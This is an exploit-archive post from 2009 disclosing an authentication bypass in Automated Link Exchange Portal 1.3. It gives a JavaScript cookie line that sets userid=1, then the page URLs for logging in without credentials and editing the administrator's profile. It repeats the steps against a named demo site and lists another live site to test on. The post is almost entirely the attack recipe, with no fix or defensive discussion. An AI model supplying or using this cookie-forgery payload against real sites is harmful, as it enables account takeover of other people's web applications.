Automated Link Exchange Portal 1.3 Multiple Remote Vulnerabilities

2009-06-08 22:35:26

-------------------------------------------------------------------------
Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:www.h4ckx.com
Script: Automated Link Exchange Portal Version 1.3
Download:http://www.cmsnx.com/product.demo.php?id=11
alf mabroke bfowze al montakhabe alwatany :D
---------------------------------------------------------------
Exploit
-------
Note:Follow these steps

after enter the cookie (javascript:document.cookie="userid=1;path=/";) and go
to login http://www.site.com/[path]/user.mainpage.php and change profile admin at
http://www.site.com/[path]/user.edit.account.php

exploit= cookie handling + Bypass login + change profile :)
--------------------------------------------------------------
cookie handling :
-----------------------

javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
Bypass login :
------------------

go to http://www.site.com/[path]/user.mainpage.php

----------------------------------------------------------------

change profile Admin :
----------------------------

http://www.site.com/[path]/user.edit.account.php

----------------------------------------------------------
Dem0
----
http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

cookie handling :
-----------------------

javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
Bypass login :
------------------

go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php

----------------------------------------------------------------

change profile Admin :
----------------------------

http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

Greeting To ALL My Friends (Dz)
-----------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.